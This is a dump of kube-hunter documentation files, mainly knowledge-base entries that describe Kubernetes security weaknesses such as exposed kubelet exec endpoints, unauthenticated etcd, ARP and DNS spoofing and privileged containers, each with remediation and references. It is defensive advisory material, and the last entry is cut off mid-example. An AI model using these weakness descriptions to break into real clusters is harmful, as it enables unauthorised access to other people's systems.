211 | jekyll-feed (~> 0.9)
212 | jekyll-seo-tag (~> 2.1)
213 | minitest (5.14.3)
214 | multipart-post (2.1.1)
215 | nokogiri (>= 1.11.4)
216 | mini_portile2 (~> 2.5.0)
217 | racc (~> 1.4)
218 | octokit (4.20.0)
219 | faraday (>= 0.9)
220 | sawyer (~> 0.8.0, >= 0.5.3)
221 | pathutil (0.16.2)
222 | forwardable-extended (~> 2.6)
223 | public_suffix (3.1.1)
224 | racc (1.5.2)
225 | rb-fsevent (0.10.4)
226 | rb-inotify (0.10.1)
227 | ffi (~> 1.0)
228 | rexml (3.2.4)
229 | rouge (3.23.0)
230 | ruby-enum (0.8.0)
231 | i18n
232 | ruby2_keywords (0.0.2)
233 | rubyzip (2.3.0)
234 | safe_yaml (1.0.5)
235 | sass (3.7.4)
236 | sass-listen (~> 4.0.0)
237 | sass-listen (4.0.0)
238 | rb-fsevent (~> 0.9, >= 0.9.4)
239 | rb-inotify (~> 0.9, >= 0.9.7)
240 | sawyer (0.8.2)
241 | addressable (>= 2.3.5)
242 | faraday (> 0.8, < 2.0)
243 | simpleidn (0.1.1)
244 | unf (~> 0.1.4)
245 | terminal-table (1.8.0)
246 | unicode-display_width (~> 1.1, >= 1.1.1)
247 | thread_safe (0.3.6)
248 | typhoeus (1.4.0)
249 | ethon (>= 0.9.0)
250 | tzinfo (1.2.9)
251 | thread_safe (~> 0.1)
252 | unf (0.1.4)
253 | unf_ext
254 | unf_ext (0.0.7.7)
255 | unicode-display_width (1.7.0)
256 | zeitwerk (2.4.2)
257 |
258 | PLATFORMS
259 | ruby
260 |
261 | DEPENDENCIES
262 | github-pages
263 | jekyll-sitemap
264 |
265 | BUNDLED WITH
266 | 2.2.5
267 |
--------------------------------------------------------------------------------
/docs/_config.yml:
--------------------------------------------------------------------------------
1 | ---
2 | title: kube-hunter
3 | description: Kube-hunter hunts for security weaknesses in Kubernetes clusters
4 | logo: https://raw.githubusercontent.com/aquasecurity/kube-hunter/main/kube-hunter.png
5 | show_downloads: false
6 | google_analytics: UA-63272154-1
7 | theme: jekyll-theme-minimal
8 | collections:
9 | kb:
10 | output: true
11 | defaults:
12 | -
13 | scope:
14 | path: "" # an empty string here means all files in the project
15 | values:
16 | layout: "default"
17 |
18 | url: "https://aquasecurity.github.io/kube-hunter"
19 | plugins:
20 | - jekyll-sitemap
21 |
--------------------------------------------------------------------------------
/docs/_kb/KHV002.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV002
3 | title: Kubernetes version disclosure
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The fact that your infrastructure is running Kubernetes, and the specific Kubernetes version in use, is publicly available and could be used by an attacker to target your environment with vulnerabilities known to affect that version.
13 | This information could have been obtained from the Kubernetes API `/version` endpoint, or from the Kubelet's `/metrics` debug endpoint.
14 |
15 | ## Remediation
16 |
17 | Disable `--enable-debugging-handlers` kubelet flag.
18 |
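For example, the debug handlers can also be turned off declaratively in the kubelet configuration file (a minimal sketch; the file path is installer-specific, commonly `/var/lib/kubelet/config.yaml`):

```yaml
# Kubelet configuration excerpt; enableDebuggingHandlers defaults to true.
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
enableDebuggingHandlers: false
```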
19 | ## References
20 |
21 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
22 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV003.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV003
3 | title: Azure Metadata Exposure
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Microsoft Azure provides an internal HTTP endpoint that exposes information from the cloud platform to workloads running in a VM. The endpoint is accessible to every workload running in the VM. An attacker that is able to execute a pod in the cluster may be able to query the metadata service and discover additional information about the environment.
13 |
14 | ## Remediation
15 |
16 | Starting with the 2020.10.15 Azure VHD release, AKS blocks access to that internal HTTP endpoint from the pod CIDR.
17 |
18 | [CVE-2021-27075](https://github.com/Azure/AKS/issues/2168)
19 |
20 |
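For clusters where that platform-level protection is not available, egress to the metadata address can also be blocked with a NetworkPolicy. A minimal sketch, assuming your CNI plugin enforces NetworkPolicy (the policy and namespace names are hypothetical):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-cloud-metadata   # hypothetical name
  namespace: default          # apply per namespace
spec:
  podSelector: {}             # all pods in the namespace
  policyTypes:
    - Egress
  egress:
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              - 169.254.169.254/32   # the Azure Instance Metadata Service address
```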
21 | ## References
22 |
23 | - [Azure Instance Metadata service](https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service)
24 | - [AAD Pod Identity](https://github.com/Azure/aad-pod-identity#demo)
25 |
--------------------------------------------------------------------------------
/docs/_kb/KHV004.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV004
3 | title: Azure SPN Exposure
4 | categories: [Identity Theft]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Kubernetes has native integration with Microsoft Azure; as a result, a Kubernetes installation on Azure requires API access to manage the cluster's resources in Azure (for example, to create a cloud load balancer). Some installations of Kubernetes on Azure rely on a shared file on the node, `/etc/kubernetes/azure.json`, that contains credentials to the Azure API. A Pod with access to this file may become a gateway for an attacker to control your Azure environment.
13 |
14 | ## Remediation
15 |
16 | A better solution is to use Azure Managed Identities instead of a static SPN. However, this functionality is not yet mature, and is currently available only in alpha for aks-engine (non-managed Kubernetes).
17 | 
18 | You can update or rotate the cluster SPN credentials to prevent leaked credentials from persisting over time.
19 |
20 | ## References
21 |
22 | - [Service principals with Azure Kubernetes Service (AKS)](https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/aks/kubernetes-service-principal.md)
23 | - [What is managed identities for Azure resources?](https://docs.microsoft.com/en-us/azure/active-directory/managed-identities-azure-resources/overview)
24 | - [aks-engine Features - Managed Identity](https://github.com/Azure/aks-engine/blob/master/docs/topics/features.md#managed-identity)
25 | - [Update or rotate the credentials for a service principal in Azure Kubernetes Service (AKS)](https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/aks/update-credentials.md)
26 |
--------------------------------------------------------------------------------
/docs/_kb/KHV005.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV005
3 | title: Access to Kubernetes API
4 | categories: [Information Disclosure, Unauthenticated Access]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The Kubernetes API was accessed with the Pod's Service Account, or without authentication (see the report message for details).
13 |
14 | ## Remediation
15 |
16 | Secure access to your Kubernetes API.
17 |
18 | It is recommended to explicitly specify a Service Account for all of your workloads (`serviceAccountName` in `Pod.spec`), and to manage their permissions according to the principle of least privilege.
19 | 
20 | Consider opting out of automatic mounting of the SA token by setting `automountServiceAccountToken: false` on the `ServiceAccount` resource or in `Pod.spec`.
21 |
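A minimal sketch of both settings in a Pod spec (the pod, service account, and image names are hypothetical):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: example-pod                     # hypothetical
spec:
  serviceAccountName: app-sa            # explicit, least-privilege service account (hypothetical)
  automountServiceAccountToken: false   # do not mount the SA token into containers
  containers:
    - name: app
      image: example/app:latest         # hypothetical
```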
22 |
23 | ## References
24 |
25 | - [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
26 |
--------------------------------------------------------------------------------
/docs/_kb/KHV006.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV006
3 | title: Insecure (HTTP) access to Kubernetes API
4 | categories: [Unauthenticated Access]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The API Server port is accessible over plain HTTP, and is therefore unencrypted and potentially insecure.
13 |
14 | ## Remediation
15 |
16 | Ensure your setup is exposing kube-api only on an HTTPS port.
17 |
18 | Do not enable kube-api's `--insecure-port` flag in production.
19 |
20 |
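A sketch of what this looks like in a kube-apiserver static Pod manifest (an excerpt only; note the flag was deprecated and later removed in newer Kubernetes releases, where no insecure port exists at all):

```yaml
# Excerpt from a hypothetical /etc/kubernetes/manifests/kube-apiserver.yaml
spec:
  containers:
    - name: kube-apiserver
      command:
        - kube-apiserver
        - --insecure-port=0    # disable the plain-HTTP port
        - --secure-port=6443   # serve only over TLS
```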
21 | ## References
22 |
23 | - [API Server Ports and IPs](https://kubernetes.io/docs/reference/access-authn-authz/controlling-access/#api-server-ports-and-ips)
24 | - [kube-apiserver command reference](https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/)
25 |
--------------------------------------------------------------------------------
/docs/_kb/KHV007.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV007
3 | title: Specific Access to Kubernetes API
4 | categories: [Access Risk]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | kube-hunter was able to perform the action specified by the reported vulnerability (check the report for more information). This may or may not be a problem, depending on your cluster setup and preferences.
13 |
14 | ## Remediation
15 |
16 | Review the RBAC permissions to Kubernetes API server for the anonymous and default service account.
17 |
18 | ## References
19 |
20 | - [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
21 | - [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})
--------------------------------------------------------------------------------
/docs/_kb/KHV020.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV020
3 | title: Possible Arp Spoof
4 | categories: [IdentityTheft]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | When using basic (but common) container networking in the cluster, containers on the same host are bridged together to form a virtual layer 2 network. This setup is common in Kubernetes installations, as is granting the `NET_RAW` capability to Pods, which gives them low-level access to network interactions. By pairing these two issues, a malicious Pod running on the cluster could abuse the ARP protocol (used to discover MAC addresses by IP) to spoof the IP address of another Pod on the same node, making other Pods on the node talk to the attacker's Pod instead of the legitimate one.
13 |
14 | ## Remediation
15 |
16 | Consider dropping the `NET_RAW` capability from your pods using `Pod.spec.securityContext.capabilities`, as shown below.
17 |
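A minimal sketch (pod and image names are hypothetical):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: example-pod               # hypothetical
spec:
  containers:
    - name: app
      image: example/app:latest   # hypothetical
      securityContext:
        capabilities:
          drop:
            - NET_RAW             # removes raw-socket access, blocking ARP spoofing
```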
18 | ## References
19 |
20 | - [DNS Spoofing on Kubernetes Clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
21 | - [Configure a Security Context for a Pod or Container](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV021.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV021
3 | title: Certificate Includes Email Address
4 | categories: [Information Disclosure]
5 | severity: low
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The Kubernetes API Server advertises a public certificate for TLS. This certificate includes an email address, which may give an attacker additional information about your organization, or be abused for further email-based attacks.
13 |
14 | ## Remediation
15 |
16 | Do not include an email address in the Kubernetes API server certificate. (You should continue to use certificates to secure the API Server!)
17 |
--------------------------------------------------------------------------------
/docs/_kb/KHV022.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV022
3 | title: Critical Privilege Escalation CVE
4 | categories: [Privilege Escalation]
5 | severity: critical
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Cluster is found to be vulnerable to CVE-2018-1002105. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [Severe Privilege Escalation Vulnerability in Kubernetes (CVE-2018-1002105)](https://blog.aquasec.com/kubernetes-security-cve-2018-1002105)
--------------------------------------------------------------------------------
/docs/_kb/KHV023.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV023
3 | title: Denial of Service to Kubernetes API Server
4 | categories: [Denial Of Service]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Cluster is found to be vulnerable to CVE-2019-1002100. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [Kubernetes API Server Patch DoS Vulnerability (CVE-2019-1002100)](https://blog.aquasec.com/kubernetes-vulnerability-cve-2019-1002100)
--------------------------------------------------------------------------------
/docs/_kb/KHV024.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV024
3 | title: Possible Ping Flood Attack
4 | categories: [Denial Of Service]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Cluster is found to be vulnerable to CVE-2019-9512. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [HTTP/2 Denial of Service Advisory](https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md)
21 | - [CVE-2019-9512](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9512)
--------------------------------------------------------------------------------
/docs/_kb/KHV025.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV025
3 | title: Possible Reset Flood Attack
4 | categories: [Denial Of Service]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Cluster is found to be vulnerable to CVE-2019-9514. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [HTTP/2 Denial of Service Advisory](https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md)
21 | - [CVE-2019-9514](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9514)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV026.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV026
3 | title: Arbitrary Access To Cluster Scoped Resources
4 | categories: [PrivilegeEscalation]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Cluster is found to be vulnerable to CVE-2019-11247. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [CVE-2019-11247: API server allows access to custom resources via wrong scope](https://github.com/kubernetes/kubernetes/issues/80983)
21 | - [CVE-2019-11247](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11247)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV027.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV027
3 | title: Kubectl Vulnerable To CVE-2019-11246
4 | categories: [Remote Code Execution]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Kubectl is found to be vulnerable to CVE-2019-11246. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [CVE-2019-11246: Another kubectl Path Traversal Vulnerability Disclosed](https://blog.aquasec.com/kubernetes-security-kubectl-cve-2019-11246)
21 |
--------------------------------------------------------------------------------
/docs/_kb/KHV028.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV028
3 | title: Kubectl Vulnerable To CVE-2019-1002101
4 | categories: [Remote Code Execution]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Kubectl is found to be vulnerable to CVE-2019-1002101. Please see the Vulnerability description for additional information.
13 |
14 | ## Remediation
15 |
16 | Please see the Vulnerability description for remediation.
17 |
18 | ## References
19 |
20 | - [CVE-2019-1002101](https://nvd.nist.gov/vuln/detail/CVE-2019-1002101)
21 | - [Another kubectl Path Traversal Vulnerability Disclosed](https://blog.aquasec.com/kubernetes-security-kubectl-cve-2019-11246)
22 |
--------------------------------------------------------------------------------
/docs/_kb/KHV029.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV029
3 | title: Dashboard Exposed
4 | categories: [Remote Code Execution]
5 | severity: critical
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An open Kubernetes Dashboard was detected. The Kubernetes Dashboard can be used by an attacker to learn about the cluster and potentially to create new resources.
13 |
14 | ## Remediation
15 |
16 | Do not leave the Dashboard unsecured.
17 |
18 |
--------------------------------------------------------------------------------
/docs/_kb/KHV030.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV030
3 | title: Possible DNS Spoof
4 | categories: [Identity Theft]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Your Kubernetes DNS setup is vulnerable to spoofing attacks which impersonate your DNS for malicious purposes.
13 | In this case the exploited vulnerability was ARP spoofing, but other methods could be used as well.
14 |
15 | ## Remediation
16 |
17 | Consider using DNS over TLS. CoreDNS (the common DNS server for Kubernetes) supports this out of the box, but your client applications might not.
18 |
19 | ## References
20 |
21 | - [DNS Spoofing on Kubernetes Clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
22 | - [KHV020 - Possible Arp Spoof]({{ site.baseurl }}{% link _kb/KHV020.md %})
23 | - [CoreDNS DNS over TLS](https://coredns.io/manual/toc/#specifying-a-protocol)
24 | - [DNS over TLS spec](https://tools.ietf.org/html/rfc7858)
--------------------------------------------------------------------------------
/docs/_kb/KHV031.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV031
3 | title: Etcd Remote Write Access Event
4 | categories: [Remote Code Execution]
5 | severity: critical
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Etcd (Kubernetes' Database) is writable without authentication. This gives full control of your Kubernetes cluster to an attacker with access to etcd.
13 |
14 | ## Remediation
15 |
16 | Ensure your etcd is accepting connections only from the Kubernetes API, using the `--trusted-ca-file` etcd flag. This is usually done by the installer, or cloud platform.
17 |
18 | ## References
19 |
20 | - [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
21 | - [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)
--------------------------------------------------------------------------------
/docs/_kb/KHV032.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV032
3 | title: Etcd Remote Read Access Event
4 | categories: [Access Risk]
5 | severity: critical
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | Etcd (Kubernetes' Database) is accessible without authentication. This exposes the entire state of your Kubernetes cluster to the reader.
13 |
14 | ## Remediation
15 |
16 | Ensure your etcd is accepting connections only from the Kubernetes API, using the `--trusted-ca-file` etcd flag. This is usually done by the installer, or cloud platform.
17 |
18 | ## References
19 |
20 | - [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
21 | - [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)
--------------------------------------------------------------------------------
/docs/_kb/KHV033.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV033
3 | title: Etcd Remote version disclosure
4 | categories: [Information Disclosure]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The fact that your infrastructure is running etcd, and the specific etcd version in use, is publicly available and could be used by an attacker to target your environment with vulnerabilities known to affect that version.
13 |
14 |
--------------------------------------------------------------------------------
/docs/_kb/KHV034.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV034
3 | title: Etcd is accessible using insecure connection (HTTP)
4 | categories: [Unauthenticated Access]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The etcd server (Kubernetes database) port is accessible over plain HTTP, and is therefore unencrypted and potentially insecure.
13 |
14 | ## Remediation
15 |
16 | Ensure your setup is exposing etcd only on an HTTPS port by using the etcd flags `--key-file` and `--cert-file`.
17 |
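A sketch of the relevant flags in an etcd static Pod manifest (an excerpt only; the certificate paths shown are common kubeadm defaults and may differ in your setup):

```yaml
# Excerpt from a hypothetical /etc/kubernetes/manifests/etcd.yaml
spec:
  containers:
    - name: etcd
      command:
        - etcd
        - --cert-file=/etc/kubernetes/pki/etcd/server.crt   # serve over TLS
        - --key-file=/etc/kubernetes/pki/etcd/server.key
        - --client-cert-auth=true                           # require client certificates
        - --trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt
```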
18 | ## References
19 |
20 | - [etcd - Transport security model](https://etcd.io/docs/v3.4.0/op-guide/security/)
21 | - [Operating etcd clusters for Kubernetes - Securing etcd clusters](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters)
--------------------------------------------------------------------------------
/docs/_kb/KHV036.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV036
3 | title: Anonymous Authentication
4 | categories: [Remote Code Execution]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTP API. This may expose certain information and capabilities to an attacker with access to the kubelet API.
13 |
14 | ## Remediation
15 |
16 | Ensure the kubelet is protected using the `--anonymous-auth=false` kubelet flag. Allow only legitimate users using the `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
17 |
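The same settings expressed declaratively in the kubelet configuration file (a minimal sketch; the CA file path is installer-specific):

```yaml
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: false    # reject unauthenticated requests
  webhook:
    enabled: true     # validate bearer tokens against the API server
  x509:
    clientCAFile: /etc/kubernetes/pki/ca.crt   # installer-specific path
authorization:
  mode: Webhook       # delegate authorization to the API server
```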
18 | ## References
19 |
20 | - [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
--------------------------------------------------------------------------------
/docs/_kb/KHV037.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV037
3 | title: Exposed Container Logs
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is leaking container logs via the `/containerLogs` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 |
15 | ## Remediation
16 |
17 | Disable `--enable-debugging-handlers` kubelet flag.
18 |
19 | ## References
20 |
21 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
22 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV038.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV038
3 | title: Exposed Running Pods
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is leaking information about running pods via the `/runningpods` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 |
15 | ## Remediation
16 |
17 | Disable `--enable-debugging-handlers` kubelet flag.
18 |
19 | ## References
20 |
21 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
22 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV039.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV039
3 | title: Exposed Exec On Container
4 | categories: [Remote Code Execution]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An attacker could run arbitrary commands on a container via the kubelet's `/exec` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable `--enable-debugging-handlers` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV040.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV040
3 | title: Exposed Run Inside Container
4 | categories: [Remote Code Execution]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An attacker could run arbitrary commands on a container via the kubelet's `/run` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable `--enable-debugging-handlers` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV041.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV041
3 | title: Exposed Port Forward
4 | categories: [Remote Code Execution]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An attacker could read and write data from a pod via the kubelet's `/portForward` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable `--enable-debugging-handlers` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV042.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV042
3 | title: Exposed Attaching To Container
4 | categories: [Remote Code Execution]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An attacker could attach to a running container via a websocket on the kubelet's `/attach` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable the kubelet's debug handlers by setting the `--enable-debugging-handlers=false` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV043.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV043
3 | title: Cluster Health Disclosure
4 | categories: [Information Disclosure]
5 | severity: low
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is leaking its health information, which may contain sensitive details, via the `/healthz` endpoint. This endpoint is exposed as part of the kubelet's debug handlers.
13 |
14 | ## Remediation
15 |
16 | Disable the kubelet's debug handlers by setting the `--enable-debugging-handlers=false` kubelet flag.
17 |
18 | ## References
19 |
20 | - [kubelet server code](https://github.com/kubernetes/kubernetes/blob/4a6935b31fcc4d1498c977d90387e02b6b93288f/pkg/kubelet/server/server.go)
21 | - [Kubelet - options](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/#options)
--------------------------------------------------------------------------------
/docs/_kb/KHV044.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV044
3 | title: Privileged Container
4 | categories: [Access Risk]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.
13 |
14 | ## Remediation
15 |
16 | Minimize the use of privileged containers.
17 |
18 | Use Pod Security Policies to enforce a `privileged: false` policy (sketched below).
19 |
20 | ## References
21 |
22 | - [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
23 | - [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)
24 |
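25 | A minimal sketch of the Pod Security Policy remediation above (the policy name is illustrative, and the trailing fields are required boilerplate for a valid policy):
26 | 
27 | ~~~
28 | apiVersion: policy/v1beta1
29 | kind: PodSecurityPolicy
30 | metadata:
31 |   name: disallow-privileged   # illustrative name
32 | spec:
33 |   privileged: false           # forbid privileged containers
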